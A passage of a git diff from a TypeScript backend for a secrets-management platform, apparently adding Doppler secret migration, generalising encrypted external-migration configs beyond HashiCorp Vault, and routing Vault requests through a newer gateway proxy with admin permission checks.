db.ref("description").withSchema(TableName.AppConnection).as("appConnectionDescription"), + db.ref("version").withSchema(TableName.AppConnection).as("appConnectionVersion"), + db.ref("gatewayId").withSchema(TableName.AppConnection).as("appConnectionGatewayId"), + db.ref("projectId").withSchema(TableName.AppConnection).as("appConnectionProjectId"), + db.ref("createdAt").withSchema(TableName.AppConnection).as("appConnectionCreatedAt"), + db.ref("updatedAt").withSchema(TableName.AppConnection).as("appConnectionUpdatedAt") + ); + +const mapResultToConnection = (raw: Record) => { + const result = raw as TExternalMigrationConfigs & Record; + return { + ...result, + connection: raw.appConnectionId + ? { + id: raw.appConnectionId as string, + name: raw.appConnectionName as string, + app: raw.appConnectionApp, + encryptedCredentials: raw.appConnectionEncryptedCredentials as Buffer, + orgId: raw.appConnectionOrgId as string, + method: raw.appConnectionMethod, + description: raw.appConnectionDescription, + version: raw.appConnectionVersion, + gatewayId: raw.appConnectionGatewayId, + projectId: raw.appConnectionProjectId, + createdAt: raw.appConnectionCreatedAt as Date, + updatedAt: raw.appConnectionUpdatedAt as Date, + isAutoRotationEnabled: raw.appConnectionIsAutoRotationEnabled as boolean + } + : undefined + }; +}; + +export const externalMigrationConfigDALFactory = (db: TDbClient) => { + const orm = ormify(db, TableName.ExternalMigrationConfig); + + const findOne = async (filter: { orgId: string; provider?: string; connectionId?: string | null }, tx?: Knex) => { + try { + const qb = buildConnectionJoin((tx || db?.replicaNode?.() || db)(TableName.ExternalMigrationConfig), db); + /* eslint-disable @typescript-eslint/no-misused-promises */ + void qb.where(buildFindFilter(prependTableNameToFindFilter(TableName.ExternalMigrationConfig, filter))); + /* eslint-enable @typescript-eslint/no-misused-promises */ + + const result = (await qb.first()) as Record | undefined; + if (!result) return undefined; + + return mapResultToConnection(result); + } catch (error) { + throw new DatabaseError({ error, name: "Find one" }); + } + }; + + const findWithConnection = async (filter: { orgId: string; provider?: string }, tx?: Knex) => { + try { + const qb = buildConnectionJoin((tx || db?.replicaNode?.() || db)(TableName.ExternalMigrationConfig), db); + /* eslint-disable @typescript-eslint/no-misused-promises */ + void qb.where(buildFindFilter(prependTableNameToFindFilter(TableName.ExternalMigrationConfig, filter))); + /* eslint-enable @typescript-eslint/no-misused-promises */ + + const results = (await qb) as Record[]; + return results.map(mapResultToConnection); + } catch (error) { + throw new DatabaseError({ error, name: "Find with connection" }); + } + }; + + return { ...orm, findOne, findWithConnection }; +}; diff --git a/backend/src/services/external-migration/external-migration-fns/doppler.ts b/backend/src/services/external-migration/external-migration-fns/doppler.ts new file mode 100644 index 00000000000..4df23878798 --- /dev/null +++ b/backend/src/services/external-migration/external-migration-fns/doppler.ts @@ -0,0 +1,8 @@ +// Re-export Doppler API helpers for use in the migration service. +// The actual implementation lives in the Doppler AppConnection package. +export { + getDopplerSecrets, + listDopplerConfigs, + listDopplerEnvironments, + listDopplerProjects +} from "@app/services/app-connection/doppler/doppler-connection-fns"; diff --git a/backend/src/services/external-migration/external-migration-fns/index.ts b/backend/src/services/external-migration/external-migration-fns/index.ts index 4af82bf2285..a7e60cabc47 100644 --- a/backend/src/services/external-migration/external-migration-fns/index.ts +++ b/backend/src/services/external-migration/external-migration-fns/index.ts @@ -1,3 +1,4 @@ +export * from "./doppler"; export * from "./envkey"; export * from "./import"; export * from "./vault"; diff --git a/backend/src/services/external-migration/external-migration-fns/vault.ts b/backend/src/services/external-migration/external-migration-fns/vault.ts index e84284cdc1e..6e32be90759 100644 --- a/backend/src/services/external-migration/external-migration-fns/vault.ts +++ b/backend/src/services/external-migration/external-migration-fns/vault.ts @@ -1,11 +1,13 @@ import https from "node:https"; -import axios, { AxiosInstance } from "axios"; +import axios, { AxiosInstance, isAxiosError } from "axios"; import { v4 as uuidv4 } from "uuid"; import { TGatewayServiceFactory } from "@app/ee/services/gateway/gateway-service"; +import { TGatewayV2ServiceFactory } from "@app/ee/services/gateway-v2/gateway-v2-service"; import { BadRequestError } from "@app/lib/errors"; import { GatewayProxyProtocol, withGatewayProxy } from "@app/lib/gateway"; +import { withGatewayV2Proxy } from "@app/lib/gateway-v2/gateway-v2"; import { logger } from "@app/lib/logger"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; @@ -18,31 +20,50 @@ type VaultData = { secretData: Record; }; -const vaultFactory = (gatewayService: Pick) => { +const vaultFactory = ( + gatewayService: Pick, + gatewayV2Service: Pick +) => { const $gatewayProxyWrapper = async ( inputs: { gatewayId: string; - targetHost?: string; - targetPort?: number; + targetProtocol: string; + targetHostname: string; + targetPort: number; }, - gatewayCallback: (host: string, port: number, httpsAgent?: https.Agent) => Promise + gatewayCallback: (host: string, port: number, httpsAgent?: https.Agent, hostHeader?: string) => Promise ): Promise => { - const relayDetails = await gatewayService.fnGetGatewayClientTlsByGatewayId(inputs.gatewayId); - - const callbackResult = await withGatewayProxy( - async (port, httpsAgent) => { - const res = await gatewayCallback("http://localhost", port, httpsAgent); - return res; - }, - { - protocol: GatewayProxyProtocol.Http, - targetHost: inputs.targetHost, - targetPort: inputs.targetPort, - relayDetails - } - ); + const { gatewayId, targetProtocol, targetHostname, targetPort } = inputs; + + const gatewayV2Details = await gatewayV2Service.getPlatformConnectionDetailsByGatewayId({ + gatewayId, + targetHost: targetHostname, + targetPort + }); - return callbackResult; + if (gatewayV2Details) { + const isHttps = targetProtocol === "https"; + const httpsAgent = isHttps ? new https.Agent({ servername: targetHostname }) : undefined; + + return withGatewayV2Proxy( + async (port) => gatewayCallback(`${targetProtocol}://localhost`, port, httpsAgent, targetHostname), + { + protocol: GatewayProxyProtocol.Tcp, + relayHost: gatewayV2Details.relayHost, + gateway: gatewayV2Details.gateway, + relay: gatewayV2Details.relay + } + ); + } + + const relayDetails = await gatewayService.fnGetGatewayClientTlsByGatewayId(gatewayId); + + return withGatewayProxy(async (port, httpsAgent) => gatewayCallback("http://localhost", port, httpsAgent), { + protocol: GatewayProxyProtocol.Http, + targetHost: `${targetProtocol}://${targetHostname}`, + targetPort, + relayDetails + }); }; const getMounts = async (request: AxiosInstance) => { @@ -51,7 +72,7 @@ const vaultFactory = (gatewayService: Pick; }>("/v1/sys/mounts") .catch((err) => { - if (axios.isAxiosError(err)) { + if (isAxiosError(err)) { logger.error(err.response?.data, "External migration: Failed to get Vault mounts"); } throw err; @@ -87,7 +108,7 @@ const vaultFactory = (gatewayService: Pick(`/v1/${mountPath}/data/${secretPath}`) .catch((err) => { - if (axios.isAxiosError(err)) { + if (isAxiosError(err)) { // handle soft-deleted secrets (Vault returns 404 with metadata for soft deleted secrets) const vaultResponse = err.response?.data as { data?: { metadata?: { deletion_time?: string } } }; @@ -152,7 +173,7 @@ const vaultFactory = (gatewayService: Pick(`/v1/${mountPath}/${secretPath}`) .catch((err) => { - if (axios.isAxiosError(err)) { + if (isAxiosError(err)) { logger.error(err.response?.data, "External migration: Failed to get Vault secret"); } throw err; @@ -208,15 +229,17 @@ const vaultFactory = (gatewayService: Pick { - const getData = async (host: string, port?: number, httpsAgent?: https.Agent) => { + const getData = async (host: string, port?: number, httpsAgent?: https.Agent, hostHeader?: string) => { const allData: VaultData[] = []; const request = axios.create({ baseURL: port ? `${host}:${port}` : host, headers: { "X-Vault-Token": accessToken, - ...(namespace ? { "X-Vault-Namespace": namespace } : {}) + ...(namespace ? { "X-Vault-Namespace": namespace } : {}), + ...(hostHeader ? { Host: hostHeader } : {}) }, + maxRedirects: 0, httpsAgent }); @@ -279,12 +302,14 @@ const vaultFactory = (gatewayService: Pick } + { + gatewayService, + gatewayV2Service + }: { + gatewayService: Pick; + gatewayV2Service: Pick; + } ) => { await blockLocalAndPrivateIpAddresses(vaultUrl); @@ -559,7 +590,7 @@ export const importVaultDataFn = async ( `[importVaultDataFn]: Running ${orgId in vaultMigrationTransformMappings ? "custom" : "default"} transform` ); - const vaultApi = vaultFactory(gatewayService); + const vaultApi = vaultFactory(gatewayService, gatewayV2Service); const vaultData = await vaultApi.collectVaultData({ accessToken: vaultAccessToken, diff --git a/backend/src/services/external-migration/external-migration-schemas.ts b/backend/src/services/external-migration/external-migration-schemas.ts new file mode 100644 index 00000000000..ae16ba3b369 --- /dev/null +++ b/backend/src/services/external-migration/external-migration-schemas.ts @@ -0,0 +1,26 @@ +import { z } from "zod"; + +export enum ExternalMigrationProviders { + Vault = "vault", + EnvKey = "env-key", + Doppler = "doppler" +} + +export const ExternalMigrationConfigVaultConfigSchema = z.object({ + namespace: z.string() +}); + +export const ExternalMigrationConfigDopplerConfigSchema = z.object({}); + +export const ExternalMigrationConfigSchema = z.discriminatedUnion("provider", [ + z.object({ + provider: z.literal(ExternalMigrationProviders.Vault), + config: ExternalMigrationConfigVaultConfigSchema + }), + z.object({ + provider: z.literal(ExternalMigrationProviders.Doppler), + config: ExternalMigrationConfigDopplerConfigSchema + }) +]); + +export type TExternalMigrationConfig = z.infer; diff --git a/backend/src/services/external-migration/external-migration-service.ts b/backend/src/services/external-migration/external-migration-service.ts index d9c13f4f2e4..11084e992bf 100644 --- a/backend/src/services/external-migration/external-migration-service.ts +++ b/backend/src/services/external-migration/external-migration-service.ts @@ -10,14 +10,14 @@ import { TGatewayServiceFactory } from "@app/ee/services/gateway/gateway-service import { TGatewayV2ServiceFactory } from "@app/ee/services/gateway-v2/gateway-v2-service"; import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { crypto } from "@app/lib/crypto/cryptography"; -import { DatabaseErrorCode } from "@app/lib/error-codes"; -import { BadRequestError, DatabaseError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; +import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; import { GatewayVersion } from "@app/lib/gateway/types"; import { OrgServiceActor } from "@app/lib/types"; import { AppConnection } from "../app-connection/app-connection-enums"; import { decryptAppConnectionCredentials } from "../app-connection/app-connection-fns"; import { TAppConnectionServiceFactory } from "../app-connection/app-connection-service"; +import { TDopplerConnection } from "../app-connection/doppler"; import { convertVaultValueToString, getHCVaultAuthMounts, @@ -27,8 +27,9 @@ import { getHCVaultKubernetesRoles, getHCVaultLdapRoles, getHCVaultPolicyNames, - getHCVaultSecretsForPath, + getHCVaultSecretsForPaths, HCVaultAuthType, + JsonValue, listHCVaultMounts, listHCVaultPolicies, listHCVaultSecretPaths, @@ -36,28 +37,34 @@ import { THCVaultConnection } from "../app-connection/hc-vault"; import { TKmsServiceFactory } from "../kms/kms-service"; +import { KmsDataKey } from "../kms/kms-types"; import { TSecretServiceFactory } from "../secret/secret-service"; import { SecretProtectionType } from "../secret/secret-types"; import { TUserDALFactory } from "../user/user-dal"; +import { TExternalMigrationConfigDALFactory } from "./external-migration-config-dal"; import { decryptEnvKeyDataFn, + getDopplerSecrets, importVaultDataFn, + listDopplerConfigs, + listDopplerEnvironments, + listDopplerProjects, parseEnvKeyDataFn, vaultMigrationTransformMappings } from "./external-migration-fns"; import { TExternalMigrationQueueFactory } from "./external-migration-queue"; +import { ExternalMigrationConfigVaultConfigSchema, ExternalMigrationProviders } from "./external-migration-schemas"; import { - ExternalMigrationProviders, + ExternalMigrationImportStatus, ExternalPlatforms, - TCreateVaultExternalMigrationDTO, - TDeleteVaultExternalMigrationDTO, + TCreateExternalMigrationDTO, + TDeleteExternalMigrationDTO, THasCustomVaultMigrationDTO, + TImportDopplerSecretsDTO, TImportEnvKeyDataDTO, TImportVaultDataDTO, - TUpdateVaultExternalMigrationDTO, - VaultImportStatus + TUpdateExternalMigrationDTO } from "./external-migration-types"; -import { TVaultExternalMigrationConfigDALFactory } from "./vault-external-migration-config-dal"; type TExternalMigrationServiceFactoryDep = { permissionService: TPermissionServiceFactory; @@ -65,9 +72,9 @@ type TExternalMigrationServiceFactoryDep = { auditLogService: Pick; externalMigrationQueue: TExternalMigrationQueueFactory; appConnectionService: Pick; - vaultExternalMigrationConfigDAL: Pick< - TVaultExternalMigrationConfigDALFactory, - "create" | "findOne" | "transaction" | "find" | "updateById" | "deleteById" | "findById" + externalMigrationConfigDAL: Pick< + TExternalMigrationConfigDALFactory, + "create" | "findOne" | "transaction" | "find" | "updateById" | "deleteById" | "findById" | "findWithConnection" >; userDAL: Pick; gatewayService: Pick; @@ -86,7 +93,7 @@ export const externalMigrationServiceFactory = ({ secretService, auditLogService, appConnectionService, - vaultExternalMigrationConfigDAL, + externalMigrationConfigDAL, kmsService }: TExternalMigrationServiceFactoryDep) => { const getGatewayDetails = async (connection: THCVaultConnection) => { @@ -153,28 +160,44 @@ export const externalMigrationServiceFactory = ({ throw new ForbiddenRequestError({ message: `Only admins can ${action}` }); } - const vaultConfig = await vaultExternalMigrationConfigDAL.findOne({ + const existingConfig = await externalMigrationConfigDAL.findWithConnection({ orgId: actor.orgId, - namespace + provider: ExternalMigrationProviders.Vault }); - if (!vaultConfig) { + const { decryptor } = await kmsService.createCipherPairWithDataKey({ + type: KmsDataKey.Organization, + orgId: actor.orgId + }); + + const migrationConfig = existingConfig + .map((config) => { + const decryptedConfig = decryptor({ cipherTextBlob: config.encryptedConfig }); + + return { + ...config, + config: ExternalMigrationConfigVaultConfigSchema.parse(JSON.parse(decryptedConfig.toString())) + }; + }) + .find((config) => config.config.namespace === namespace); + + if (!migrationConfig) { throw new NotFoundError({ message: "Vault migration config not found for this namespace" }); } - if (!vaultConfig.connection) { + if (!migrationConfig.connection) { throw new BadRequestError({ message: "Vault migration connection is not configured for this namespace" }); } const credentials = await decryptAppConnectionCredentials({ - orgId: vaultConfig.orgId, - encryptedCredentials: vaultConfig.connection.encryptedCredentials, + orgId: migrationConfig.orgId, + encryptedCredentials: migrationConfig.connection?.encryptedCredentials, kmsService, projectId: null }); return { - ...vaultConfig.connection, + ...migrationConfig.connection, credentials } as THCVaultConnection; }; @@ -264,7 +287,8 @@ export const externalMigrationServiceFactory = ({ orgId: actorOrgId }, { - gatewayService + gatewayService, + gatewayV2Service } ); @@ -325,6 +349,13 @@ export const externalMigrationServiceFactory = ({ connection: THCVaultConnection; namespace: string; }) => { + if (connection.projectId != null) { + throw new BadRequestError({ + message: + "Vault external migration requires an organization-level HashiCorp Vault app connection. Project-scoped app connections cannot be used." + }); + } + // Allow root namespace access when no namespace is configured on the connection const isRootAccess = namespace === "root" || namespace === "/"; const hasNoNamespace = connection.credentials.namespace === undefined; @@ -356,7 +387,11 @@ export const externalMigrationServiceFactory = ({ } }; - const createVaultExternalMigration = async ({ namespace, connectionId, actor }: TCreateVaultExternalMigrationDTO) => { + const createExternalMigration = async ({ + config: migrationConfig, + connectionId, + actor + }: TCreateExternalMigrationDTO) => { const { hasRole } = await permissionService.getOrgPermission({ actorId: actor.id, actor: actor.type, @@ -367,48 +402,68 @@ export const externalMigrationServiceFactory = ({ }); if (!hasRole(OrgMembershipRole.Admin)) { - throw new ForbiddenRequestError({ message: "Only admins can configure vault external migration" }); + throw new ForbiddenRequestError({ message: "Only admins can create external migration" }); } - const connection = await appConnectionService.connectAppConnectionById( - AppConnection.HCVault, - connectionId, - actor - ); - - await validateVaultExternalMigrationConnection({ - connection, - namespace + const existingConfigs = await externalMigrationConfigDAL.find({ + orgId: actor.orgId, + provider: migrationConfig.provider }); - try { - const config = await vaultExternalMigrationConfigDAL.create({ - namespace, - connectionId, - orgId: actor.orgId - }); + const { decryptor, encryptor } = await kmsService.createCipherPairWithDataKey({ + type: KmsDataKey.Organization, + orgId: actor.orgId + }); - return config; - } catch (error) { - if ( - error instanceof DatabaseError && - (error.error as { code: string })?.code === DatabaseErrorCode.UniqueViolation - ) { - throw new BadRequestError({ - message: `Vault external migration already exists for this namespace` + if (migrationConfig.provider === ExternalMigrationProviders.Vault) { + if (existingConfigs?.length) { + const parsedConfigs = existingConfigs.map((cfg) => { + const decryptedConfig = decryptor({ cipherTextBlob: cfg.encryptedConfig }); + return ExternalMigrationConfigVaultConfigSchema.parse(JSON.parse(decryptedConfig.toString())); }); + + if (parsedConfigs.some((cfg) => cfg.namespace === migrationConfig.config.namespace)) { + throw new BadRequestError({ message: "A Vault external migration already exists for this namespace" }); + } } - throw error; + const connection = await appConnectionService.connectAppConnectionById( + AppConnection.HCVault, + connectionId, + actor + ); + await validateVaultExternalMigrationConnection({ + connection, + namespace: migrationConfig.config.namespace + }); + } else if (migrationConfig.provider === ExternalMigrationProviders.Doppler) { + await appConnectionService.connectAppConnectionById(AppConnection.Doppler, connectionId, actor); + + if (existingConfigs?.length) { + if (existingConfigs.some((cfg) => cfg.connectionId === connectionId)) { + throw new BadRequestError({ + message: "A Doppler external migration already exists with the same app connection" + }); + } + } } + + const externalMigrationConfig = await externalMigrationConfigDAL.create({ + orgId: actor.orgId, + provider: migrationConfig.provider, + encryptedConfig: encryptor({ plainText: Buffer.from(JSON.stringify(migrationConfig.config)) }).cipherTextBlob, + connectionId + }); + + return externalMigrationConfig; }; - const updateVaultExternalMigration = async ({ + const updateExternalMigration = async ({ id, - namespace, + config: migrationConfig, connectionId, actor - }: TUpdateVaultExternalMigrationDTO) => { + }: TUpdateExternalMigrationDTO) => { const { hasRole } = await permissionService.getOrgPermission({ actorId: actor.id, actor: actor.type, @@ -419,39 +474,57 @@ export const externalMigrationServiceFactory = ({ }); if (!hasRole(OrgMembershipRole.Admin)) { - throw new ForbiddenRequestError({ message: "Only admins can update vault external migration" }); + throw new ForbiddenRequestError({ message: "Only admins can update external migration" }); } - const existingConfig = await vaultExternalMigrationConfigDAL.findById(id); - const configDoesNotExist = !existingConfig; - const configBelongsToDifferentOrg = existingConfig?.orgId !== actor.orgId; + const existing = await externalMigrationConfigDAL.findById(id); + if (!existing || existing.orgId !== actor.orgId) { + throw new NotFoundError({ message: "External migration config not found" }); + } - if (configDoesNotExist || configBelongsToDifferentOrg) { - throw new NotFoundError({ message: "Vault migration config not found" }); + if (existing.provider !== migrationConfig.provider) { + throw new BadRequestError({ message: "Cannot change provider of an existing migration config" }); } - if (connectionId) { - const connection = await appConnectionService.connectAppConnectionById( - AppConnection.HCVault, - connectionId, - actor - ); + const { encryptor } = await kmsService.createCipherPairWithDataKey({ + type: KmsDataKey.Organization, + orgId: actor.orgId + }); - await validateVaultExternalMigrationConnection({ - connection, - namespace - }); + if (migrationConfig.provider === ExternalMigrationProviders.Vault) { + if (connectionId) { + const connection = await appConnectionService.connectAppConnectionById( + AppConnection.HCVault, + connectionId, + actor + ); + + await validateVaultExternalMigrationConnection({ + connection, + namespace: migrationConfig.config.namespace + }); + } + } else if (migrationConfig.provider === ExternalMigrationProviders.Doppler) { + if (connectionId) { + await appConnectionService.connectAppConnectionById(AppConnection.Doppler, connectionId, actor); + } } - const config = await vaultExternalMigrationConfigDAL.updateById(id, { - namespace, + const updatedConfig = await externalMigrationConfigDAL.updateById(id, { + encryptedConfig: encryptor({ plainText: Buffer.from(JSON.stringify(migrationConfig.config)) }).cipherTextBlob, connectionId }); - return config; + return updatedConfig; }; - const getVaultExternalMigrationConfigs = async ({ actor }: { actor: OrgServiceActor }) => { + const getExternalMigrationConfigs = async ({ + actor, + provider + }: { + actor: OrgServiceActor; + provider: ExternalMigrationProviders; + }) => { const { hasRole } = await permissionService.getOrgPermission({ actorId: actor.id, actor: actor.type, @@ -462,14 +535,13 @@ export const externalMigrationServiceFactory = ({ }); if (!hasRole(OrgMembershipRole.Admin)) { - throw new ForbiddenRequestError({ message: "Only admins can view vault external migration configs" }); + throw new ForbiddenRequestError({ message: "Only admins can view external migration configs" }); } - const configs = await vaultExternalMigrationConfigDAL.find({ - orgId: actor.orgId + return externalMigrationConfigDAL.findWithConnection({ + orgId: actor.orgId, + provider }); - - return configs; }; const getVaultNamespaces = async ({ actor }: { actor: OrgServiceActor }) => { @@ -487,16 +559,28 @@ export const externalMigrationServiceFactory = ({ } // Get all configured namespaces for this org - const vaultConfigs = await vaultExternalMigrationConfigDAL.find({ + const vaultConfigs = await externalMigrationConfigDAL.find({ + orgId: actor.orgId, + provider: ExternalMigrationProviders.Vault + }); + + const { decryptor } = await kmsService.createCipherPairWithDataKey({ + type: KmsDataKey.Organization, orgId: actor.orgId }); // Return the configured namespaces as an array of objects with id and name // where both id and name are the namespace path - const namespaces = vaultConfigs.map((config) => ({ - id: config.namespace, - name: config.namespace - })); + const namespaces = vaultConfigs.map((config) => { + const decryptedConfig = decryptor({ cipherTextBlob: config.encryptedConfig }); + + const parsedConfig = ExternalMigrationConfigVaultConfigSchema.parse(JSON.parse(decryptedConfig.toString())); + + return { + id: parsedConfig.namespace, + name: parsedConfig.namespace + }; + }); return namespaces; }; @@ -539,7 +623,7 @@ export const externalMigrationServiceFactory = ({ environment, secretPath, vaultNamespace, - vaultSecretPath, + vaultSecretPaths, auditLogInfo }: { actor: OrgServiceActor; @@ -547,18 +631,54 @@ export const externalMigrationServiceFactory = ({ environment: string; secretPath: string; vaultNamespace: string; - vaultSecretPath: string; + vaultSecretPaths: string[]; auditLogInfo: AuditLogInfo; }) => { const connection = await getVaultConnectionForNamespace(actor, vaultNamespace, "import vault secrets"); - const vaultSecrets = await getHCVaultSecretsForPath( + + if (!vaultSecretPaths.length) { + throw new BadRequestError({ message: "At least one Vault secret path is required" }); + } + + const uniqueVaultSecretPaths = Array.from(new Set(vaultSecretPaths)); + + const secretsPerPath = await getHCVaultSecretsForPaths( vaultNamespace, - vaultSecretPath, + uniqueVaultSecretPaths, connection, gatewayService, gatewayV2Service ); + const keyOrigins = new Map(); + + // build a map of secret keys to the paths they appear in + for (const { vaultSecretPath, secrets } of secretsPerPath) { + for (const secretKey of Object.keys(secrets)) { + const paths = keyOrigins.get(secretKey); + if (paths) { + paths.push(vaultSecretPath); + } else { + keyOrigins.set(secretKey, [vaultSecretPath]); + } + } + } + + const conflicts = [...keyOrigins.entries()] + .filter(([, paths]) => paths.length > 1) + .map(([secretKey, paths]) => `"${secretKey}" (in ${paths.join(", ")})`); + + if (conflicts.length) { + throw new BadRequestError({ + message: `Cannot import: the following secret keys appear in multiple selected Vault paths: ${conflicts.join("; ")}. Resolve the conflicts in Vault or import the paths separately.` + }); + } + + const vaultSecrets: Record = {}; + for (const { secrets } of secretsPerPath) { + Object.assign(vaultSecrets, secrets); + } + try { const secretOperation = await secretService.createManySecretsRaw({ actorId: actor.id, @@ -594,10 +714,10 @@ export const externalMigrationServiceFactory = ({ } }); - return { status: VaultImportStatus.ApprovalRequired }; + return { status: ExternalMigrationImportStatus.ApprovalRequired }; } - return { status: VaultImportStatus.Imported }; + return { status: ExternalMigrationImportStatus.Imported }; } catch (error) { throw new BadRequestError({ message: `Failed to import Vault secrets. ${error instanceof Error ? error.message : "Unknown error"}` @@ -605,7 +725,7 @@ export const externalMigrationServiceFactory = ({ } }; - const deleteVaultExternalMigration = async ({ id, actor }: TDeleteVaultExternalMigrationDTO) => { + const deleteExternalMigration = async ({ id, actor }: TDeleteExternalMigrationDTO) => { const { hasRole } = await permissionService.getOrgPermission({ actorId: actor.id, actor: actor.type, @@ -616,22 +736,16 @@ export const externalMigrationServiceFactory = ({ }); if (!hasRole(OrgMembershipRole.Admin)) { - throw new ForbiddenRequestError({ message: "Only admins can delete vault external migration configs" }); + throw new ForbiddenRequestError({ message: "Only admins can delete external migration configs" }); } - const config = await vaultExternalMigrationConfigDAL.findById(id); + const config = await externalMigrationConfigDAL.findById(id); - if (!config) { - throw new NotFoundError({ message: "Vault migration config not found" }); + if (!config || config.orgId !== actor.orgId) { + throw new NotFoundError({ message: "External migration config not found" }); } - if (config.orgId !== actor.orgId) { - throw new ForbiddenRequestError({ message: "Config does not belong to this organization" }); - } - - const deletedConfig = await vaultExternalMigrationConfigDAL.deleteById(id); - - return deletedConfig; + return externalMigrationConfigDAL.deleteById(id); }; const getVaultAuthMounts = async ({ @@ -699,14 +813,142 @@ export const externalMigrationServiceFactory = ({ return getHCVaultLdapRoles(namespace, mountPath, connection, gatewayService, gatewayV2Service); }; + // ─── Doppler In-Platform Migration ────────────────────────────────────────── + + const getDopplerConnectionForConfig = async (configId: string, actor: OrgServiceActor) => { + const { hasRole } = await permissionService.getOrgPermission({ + scope: OrganizationActionScope.Any, + actor: actor.type, + actorId: actor.id, + orgId: actor.orgId, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId + }); + + if (!hasRole(OrgMembershipRole.Admin)) { + throw new ForbiddenRequestError({ message: "Only admins can use Doppler migration" }); + } + + const config = await externalMigrationConfigDAL.findById(configId); + + if (!config || config.orgId !== actor.orgId || config.provider !== ExternalMigrationProviders.Doppler) { + throw new NotFoundError({ message: "Doppler migration config not found" }); + } + + if (!config.connectionId) { + throw new BadRequestError({ message: "Doppler migration config has no connection configured" }); + } + + const appConnection = await appConnectionService.connectAppConnectionById( + AppConnection.Doppler, + config.connectionId, + actor + ); + + return appConnection; + }; + + const getDopplerProjects = async ({ configId, actor }: { configId: string; actor: OrgServiceActor }) => { + const appConnection = await getDopplerConnectionForConfig(configId, actor); + return listDopplerProjects(appConnection); + }; + + const getDopplerEnvironments = async ({ + configId, + projectSlug, + actor + }: { + configId: string; + projectSlug: string; + actor: OrgServiceActor; + }) => { + const appConnection = await getDopplerConnectionForConfig(configId, actor); + return listDopplerEnvironments(appConnection, projectSlug); + }; + + const getDopplerConfigs = async ({ + configId, + projectSlug, + actor + }: { + configId: string; + projectSlug: string; + actor: OrgServiceActor; + }) => { + const appConnection = await getDopplerConnectionForConfig(configId, actor); + return listDopplerConfigs(appConnection, projectSlug); + }; + + const importDopplerSecrets = async ({ + configId, + dopplerProject, + dopplerEnvironment, + targetProjectId, + targetEnvironment, + targetSecretPath, + actor, + auditLogInfo + }: TImportDopplerSecretsDTO) => { + const appConnection = await getDopplerConnectionForConfig(configId, actor); + + const dopplerSecrets = await getDopplerSecrets(appConnection, dopplerProject, dopplerEnvironment); + + try { + const secretOperation = await secretService.createManySecretsRaw({ + actorId: actor.id, + actor: actor.type, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + projectId: targetProjectId, + environment: targetEnvironment, + secretPath: targetSecretPath, + secrets: Object.entries(dopplerSecrets).map(([secretKey, secretValue]) => ({ + secretKey, + secretValue + })) + }); + + if (secretOperation.type === SecretProtectionType.Approval) { + await auditLogService.createAuditLog({ + projectId: targetProjectId, + ...auditLogInfo, + event: { + type: EventType.SECRET_APPROVAL_REQUEST, + metadata: { + committedBy: secretOperation.approval.committerUserId, + secretApprovalRequestId: secretOperation.approval.id, + secretApprovalRequestSlug: secretOperation.approval.slug, + secretPath: targetSecretPath, + environment: targetEnvironment, + secrets: Object.entries(dopplerSecrets).map(([secretKey]) => ({ + secretKey + })), + eventType: SecretApprovalEvent.CreateMany + } + } + }); + + return { status: ExternalMigrationImportStatus.ApprovalRequired, imported: 0 }; + } + } catch (error) { + throw new BadRequestError({ + message: `Failed to import Doppler secrets. ${error instanceof Error ? error.message : "Unknown error"}` + }); + } + + return { status: ExternalMigrationImportStatus.Imported, imported: Object.keys(dopplerSecrets).length }; + }; + return { importEnvKeyData, importVaultData, hasCustomVaultMigration, - createVaultExternalMigration, - getVaultExternalMigrationConfigs, - updateVaultExternalMigration, - deleteVaultExternalMigration, + + createExternalMigration, + updateExternalMigration, + deleteExternalMigration, + getExternalMigrationConfigs, + getVaultNamespaces, getVaultPolicies, getVaultMounts, @@ -716,6 +958,11 @@ export const externalMigrationServiceFactory = ({ getVaultKubernetesAuthRoles, getVaultKubernetesRoles, getVaultDatabaseRoles, - getVaultLdapRoles + getVaultLdapRoles, + + getDopplerProjects, + getDopplerEnvironments, + getDopplerConfigs, + importDopplerSecrets }; }; diff --git a/backend/src/services/external-migration/external-migration-types.ts b/backend/src/services/external-migration/external-migration-types.ts index 2b9069b9194..fd3dbfcf455 100644 --- a/backend/src/services/external-migration/external-migration-types.ts +++ b/backend/src/services/external-migration/external-migration-types.ts @@ -1,6 +1,8 @@ +import { AuditLogInfo } from "@app/ee/services/audit-log/audit-log-types"; import { OrgServiceActor, TOrgPermission } from "@app/lib/types"; import { ActorAuthMethod, ActorType } from "../auth/auth-type"; +import { ExternalMigrationProviders, TExternalMigrationConfig } from "./external-migration-schemas"; export enum KvVersion { V1 = "1", @@ -119,19 +121,42 @@ export type TEnvKeyExportJSON = { export enum ExternalPlatforms { EnvKey = "EnvKey", - Vault = "Vault" + Vault = "Vault", + Doppler = "Doppler" } -export enum ExternalMigrationProviders { - Vault = "vault", - EnvKey = "env-key" -} - -export enum VaultImportStatus { +export enum ExternalMigrationImportStatus { Imported = "imported", ApprovalRequired = "approval-required" } +export type TCreateDopplerExternalMigrationDTO = { + connectionId: string; + actor: OrgServiceActor; +}; + +export type TUpdateDopplerExternalMigrationDTO = { + id: string; + connectionId: string | null; + actor: OrgServiceActor; +}; + +export type TDeleteDopplerExternalMigrationDTO = { + id: string; + actor: OrgServiceActor; +}; + +export type TImportDopplerSecretsDTO = { + configId: string; + dopplerProject: string; + dopplerEnvironment: string; + targetProjectId: string; + targetEnvironment: string; + targetSecretPath: string; + actor: OrgServiceActor; + auditLogInfo: AuditLogInfo; +}; + export type TCreateVaultExternalMigrationDTO = { namespace: string; connectionId: string; @@ -145,7 +170,20 @@ export type TUpdateVaultExternalMigrationDTO = { actor: OrgServiceActor; }; -export type TDeleteVaultExternalMigrationDTO = { +export type TCreateExternalMigrationDTO = { + config: TExternalMigrationConfig; + connectionId: string; + actor: OrgServiceActor; +}; + +export type TUpdateExternalMigrationDTO = { + id: string; + config: TExternalMigrationConfig; + connectionId: string | null; + actor: OrgServiceActor; +}; + +export type TDeleteExternalMigrationDTO = { id: string; actor: OrgServiceActor; }; diff --git a/backend/src/services/external-migration/vault-external-migration-config-dal.ts b/backend/src/services/external-migration/vault-external-migration-config-dal.ts deleted file mode 100644 index 453432b6ed5..00000000000 --- a/backend/src/services/external-migration/vault-external-migration-config-dal.ts +++ /dev/null @@ -1,69 +0,0 @@ -import { Knex } from "knex"; 